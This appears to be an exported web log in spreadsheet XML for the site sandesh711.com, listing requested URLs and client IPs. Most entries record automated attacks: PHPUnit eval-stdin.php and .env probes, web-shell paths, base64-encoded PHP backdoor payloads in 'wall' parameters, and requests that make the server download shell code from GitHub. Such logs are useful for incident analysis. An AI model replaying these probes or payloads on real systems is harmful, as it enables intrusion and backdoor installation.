    <t>https://sandesh711.com//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//vendor/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//vendor/phpunit/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//vendor/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//phpunit/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//lib/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//lib/phpunit/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//lib/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.local</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.production</t>
  </si>
  <si>
    <t>https://sandesh711.com//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://sandesh711.com//api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.env</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.remote</t>
  </si>
  <si>
    <t>142.202.48.16</t>
  </si>
  <si>
    <t>106.216.237.92</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/category/tamil-serial-actress/</t>
  </si>
  <si>
    <t>87.106.194.101</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/essential-addons-for-elementor-lite/includes/Traits/Shared.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/hello-dolly/hello.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/wp-doft/noimg.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/twenty/twenty.php</t>
  </si>
  <si>
    <t>194.169.175.25</t>
  </si>
  <si>
    <t>217.182.142.199</t>
  </si>
  <si>
    <t>104.250.238.232</t>
  </si>
  <si>
    <t>168.61.166.17</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/envato-market/inc/class-envato-market-api.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/images/install.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/css/install.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/install.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/install.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/install.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/patior/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/seoo/wsoyanz.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfa-rex.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-info.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ccx/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/coffee/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/about.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/blocks/table/int/tmpl/</t>
  </si>
  <si>
    <t>175.44.42.231</t>
  </si>
  <si>
    <t>http://www.elvirablog.online/</t>
  </si>
  <si>
    <t>172.200.121.221</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cgi-bin/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/acme-challenge/my1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/cgi-bin/my1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/my1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/Requests/Cookie/my1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/images/my1.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/maint/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/js/widgets/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/images/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/ok.php?bads</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=ok.php%7Chttps://raw.githubusercontent.com/H0rn3t-Sp1d3rs/H0rn3t-Sp1d3rs/main/o.txt</t>
  </si>
  <si>
    <t>41.216.188.164</t>
  </si>
  <si>
    <t>79.110.62.68</t>
  </si>
  <si>
    <t>https://segudanggambar791.blogspot.com/2021/08/mangala-gowri-maduve-video-call-please.html?m=0</t>
  </si>
  <si>
    <t>175.44.42.106</t>
  </si>
  <si>
    <t>20.219.120.238</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/1.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/style-css.php</t>
  </si>
  <si>
    <t>74.249.245.24</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/vafgvvyx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/irxjqmcz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/style-css.php</t>
  </si>
  <si>
    <t>223.196.192.218</t>
  </si>
  <si>
    <t>74.249.245.0</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hotswulm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/sroxgglw.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/maint/upfile.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/network/upfile.php</t>
  </si>
  <si>
    <t>185.254.37.241</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/inputs.php</t>
  </si>
  <si>
    <t>205.210.31.173</t>
  </si>
  <si>
    <t>157.230.249.64</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/maint/upfile.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/network/upfile.php</t>
  </si>
  <si>
    <t>74.249.244.164</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ufaawbfn.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/gedquanv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/press/wp-class.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.well-known/pki-validation/admin.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/1index.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/hellopress/wp_mna.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/.well-known/pki-validation/moon.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/sodium_compat/network.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/alfa-rex.php7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-includes/IXR/class-IXR-date-ajax-response.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/repeater.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/hello-element/footer.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/alfanew.php7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/alfanew.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/revslider/includes/external/page/</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/sketch/404.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/dropdown.php</t>
  </si>
  <si>
    <t>185.254.37.214</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/themes.php</t>
  </si>
  <si>
    <t>175.44.42.119</t>
  </si>
  <si>
    <t>http://www.kaceyblog.online/</t>
  </si>
  <si>
    <t>185.254.37.249</t>
  </si>
  <si>
    <t>20.68.170.208</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/ccx/aa/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/wp-links.php</t>
  </si>
  <si>
    <t>40.86.121.211</t>
  </si>
  <si>
    <t>172.176.207.85</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hmmnpxmb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-links.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/pki-validation/admin.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/hellopress/wp_mna.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/.well-known/pki-validation/moon.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/sodium_compat/network.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-includes/IXR/class-IXR-date-ajax-response.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/hello-element/footer.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfanew.php7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/alfanew.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/sketch/404.php</t>
  </si>
  <si>
    <t>175.44.42.110</t>
  </si>
  <si>
    <t>http://www.jacblog.xyz/</t>
  </si>
  <si>
    <t>52.173.254.102</t>
  </si>
  <si>
    <t>40.77.20.138</t>
  </si>
  <si>
    <t>157.230.38.255</t>
  </si>
  <si>
    <t>172.176.122.77</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2h6cG9pLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/batm.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/504.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/444.php</t>
  </si>
  <si>
    <t>20.230.18.246</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hoohgfqd.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/pbkhvbsc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Z0bGp0LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>74.249.172.67</t>
  </si>
  <si>
    <t>74.249.231.121</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2F1Z2FwLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>175.44.42.5</t>
  </si>
  <si>
    <t>79.110.62.161</t>
  </si>
  <si>
    <t>4.240.73.203</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/easybusy/xleet.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/rxr/rx.php</t>
  </si>
  <si>
    <t>52.165.32.17</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/trlpqaon.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/yfvpzlyz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>37.139.129.244</t>
  </si>
  <si>
    <t>40.86.124.211</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/qtnvwzrw.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/fszsveej.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/easybusy/xleet.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/rxr/rx.php</t>
  </si>
  <si>
    <t>159.223.62.108</t>
  </si>
  <si>
    <t>163.123.143.121</t>
  </si>
  <si>
    <t>45.81.39.53</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/yqrxwruz.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>34.70.1.206</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1-%e0%b2%9a%e0%b2%bf%e0%b2%a4%e0%b3%8d%e0%b2%b0-%e0%b2%ae%e0%b2%be%e0%b2%b0%e0%b3%8d%e0%b2%9f%e0%b2%bf%e0%b2%a8%e0%b3%8d-%e0%b2%ac%e0%b2%bf%e0%b2%a1/</t>
  </si>
  <si>
    <t>https://bakman.fresnounified.org/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-essay/kannada-essay-namma-kere-nammura-kere-%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1-%e0%b2%aa%e0%b3%8d%e0%b2%b0%e0%b2%ac%e0%b2%82%e0%b2%a7-%e0%b2%a8%e0%b2%ae%e0%b3%8d%e0%b2%ae-%e0%b2%95%e0%b3%86/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/03/01/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/03/02/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hindi-serial-actress/popular-hindi-serial-actress-part-1/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/03/03/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/03/10/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/hindi-serial-actress/popular-indian-serial-actress-part-2/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/03/12/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/03/15/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/bollywood-movies/a-horror-movie-you-should-not-miss/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/page/3/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/17/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/updates/updates-17-april-2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/18/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/updates/new-profiles-added-18-april-2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/19/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/updates/photos-added-19-april-2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/updates/updates-20-april-2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/%e0%b2%b6%e0%b2%be%e0%b2%95%e0%b3%81%e0%b2%82%e0%b2%a4%e0%b2%b2%e0%b2%82-%e0%b2%9a%e0%b2%b2%e0%b2%a8%e0%b2%9a%e0%b2%bf%e0%b2%a4%e0%b3%8d%e0%b2%b0-%e0%b2%b5%e0%b2%bf%e0%b2%ae%e0%b2%b0%e0%b3%8d%e0%b2%b6/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/20/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/%e0%b2%ae%e0%b2%bf%e0%b2%b8%e0%b3%86%e0%b2%b8%e0%b3%8d-%e0%b2%b5%e0%b3%8b%e0%b2%97%e0%b3%8d%e0%b2%b8%e0%b3%8d%e0%b2%9f%e0%b2%be%e0%b2%b0%e0%b3%8d-%e0%b2%87%e0%b2%82%e0%b2%a1%e0%b2%bf%e0%b2%af/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/21/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/updates/updates-21-april-2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/27/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/updates-27-april-2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/updates-29-april-2024/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%e0%b2%87%e0%b2%ac%e0%b3%8d%e0%b2%ac%e0%b2%a8%e0%b2%bf%e0%b2%af%e0%b2%b2%e0%b3%8d%e0%b2%b2%e0%b2%bf-%e0%b2%ae%e0%b2%bf%e0%b2%82%e0%b2%a6%e0%b3%86%e0%b2%a6%e0%b3%8d%e0%b2%a6-%e0%b2%ae%e0%b2%af%e0%b3%82/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%e0%b2%b8%e0%b3%8d%e0%b2%a8%e0%b3%87%e0%b2%b9%e0%b2%bf%e0%b2%a4%e0%b2%b0%e0%b2%bf%e0%b2%82%e0%b2%a6-%e0%b2%b8%e0%b3%8d%e0%b2%a8%e0%b3%87%e0%b2%b9%e0%b2%bf%e0%b2%a4%e0%b3%86%e0%b2%97%e0%b2%be%e0%b2%97/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/29/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/body-positivity-influencers-india/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/swagatha-s-krishnan-talented-tamil-playback-singer-%e0%b2%b8%e0%b3%8d%e0%b2%b5%e0%b2%be%e0%b2%97%e0%b2%a4-%e0%b2%8e%e0%b2%b8%e0%b3%8d-%e0%b2%95%e0%b3%83%e0%b2%b7%e0%b3%8d%e0%b2%a3%e0%b2%a8%e0%b3%8d/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%e0%b2%b8%e0%b3%88%e0%b2%82%e0%b2%a7%e0%b2%b5%e0%b2%a8-%e0%b2%9c%e0%b3%8a%e0%b2%a4%e0%b3%86%e0%b2%97%e0%b3%86-%e0%b2%b6%e0%b3%8d%e0%b2%b0%e0%b2%a6%e0%b3%8d%e0%b2%a7%e0%b2%be-%e0%b2%b6%e0%b3%8d/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/abhimanika/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Abhimanika</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-movies/%e0%b2%95%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b2%a1%e0%b2%a6%e0%b2%b2%e0%b3%8d%e0%b2%b2%e0%b2%bf-%e0%b2%85%e0%b2%b5%e0%b2%95%e0%b2%be%e0%b2%b6-%e0%b2%b5%e0%b2%82%e0%b2%9a%e0%b2%bf%e0%b2%a4-%e0%b2%aa/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-serial-actress/popular-indian-serial-actress-part-4/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/%e0%b2%a8%e0%b3%80%e0%b2%b5%e0%b3%81-%e0%b2%a8%e0%b2%bf%e0%b2%ae%e0%b3%8d%e0%b2%ae%e0%b2%a8%e0%b3%8d%e0%b2%a8%e0%b3%81-%e0%b2%a8%e0%b2%82%e0%b2%ac%e0%b2%bf%e0%b2%a6%e0%b2%b0%e0%b3%86-%e0%b2%af/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-kavana/%e0%b2%b9%e0%b3%82-%e0%b2%ae%e0%b2%a8%e0%b2%b8%e0%b2%bf%e0%b2%a8-%e0%b2%b9%e0%b3%81%e0%b2%a1%e0%b3%81%e0%b2%97%e0%b2%bf/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/view.php?name=Seethu</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/kannada-kavana/%e0%b2%ac%e0%b2%a3%e0%b3%8d%e0%b2%a3%e0%b2%97%e0%b2%b3%e0%b2%b2%e0%b3%8d%e0%b2%b2%e0%b2%bf-%e0%b2%ac%e0%b3%86%e0%b2%b0%e0%b3%86%e0%b2%a4%e0%b2%b5%e0%b2%b3%e0%b3%81/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/indian-celebrities-social-media-influencer-prajakta-koli/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/author/admin/page/5/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/author/admin/page/2/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/actress-anchors-models/updates-20-august-2023/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2022/11/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/02/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/03/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/05/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/06/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/07/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/08/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/page/5/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/page/2/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/04/30/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/05/02/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/05/07/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/05/15/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/05/17/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/05/20/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/05/21/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/06/24/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/07/09/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/2023/08/20/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/support-us/</t>
  </si>
  <si>
    <t>https://sandesh711.com/register.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/403.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/chtmlfuns.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/403.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/chtmlfuns.php</t>
  </si>
  <si>
    <t>198.235.24.169</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/plugins/envato-market/inc/class-envato-market-api.php</t>
  </si>
  <si>
    <t>20.57.136.83</t>
  </si>
  <si>
    <t>85.208.136.91</t>
  </si>
  <si>
    <t>34.133.106.26</t>
  </si>
  <si>
    <t>107.189.28.127</t>
  </si>
  <si>
    <t>107.189.10.84</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/hader/seothemes/autoload_classmap.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/codtheme/404.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/contus-hd-flv-player/uploadVideo.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/plugins/posts-layouts/src/</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-content/themes/Divi/404.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/viewup.php?name=Suvitha%20Rajendran&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>40.78.130.236</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/edqascxm.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/pxsrlrcx.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>52.176.91.61</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rnxeqtxj.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/iyoedhta.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>104.43.193.66</t>
  </si>
  <si>
    <t>168.235.203.247</t>
  </si>
  <si>
    <t>45.81.39.127</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wp-plain.php</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/nnwcclub.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/symwfcsc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/xkdioqes.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/liaocnhe.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>20.168.227.215</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com//wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==</t>
  </si>
  <si>
    <t>178.159.37.48</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/jk</t>
  </si>
  <si>
    <t>74.235.222.106</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/qqadsorv.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/emmmxtsi.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>175.44.42.26</t>
  </si>
  <si>
    <t>http://www.alinasblog.xyz/</t>
  </si>
  <si>
    <t>20.114.155.164</t>
  </si>
  <si>
    <t>52.142.52.122</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/shell20211028.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/wp-content/themes/finley/min.php</t>
  </si>
  <si>
    <t>46.101.193.196</t>
  </si>
  <si>
    <t>https://sandesh711.com//wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CM</t>
  </si>
  <si>
    <t>128.199.209.233</t>
  </si>
  <si>
    <t>20.26.229.159</t>
  </si>
  <si>
    <t>52.158.41.162</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/rindex.php?action=add&amp;parameter=sex.php%7Chttps://raw.githubusercontent.com/Professor6T9/uploaders/main/taf.txt</t>
  </si>
  <si>
    <t>74.249.215.245</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/class.api.php</t>
  </si>
  <si>
    <t>https://mail.sandesh711.com/xxl.php</t>
  </si>
  <si>
    <t>72.14.183.187</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wryuwcac.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>https://www.sandesh711.com/wanspnle.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>51.158.144.96</t>
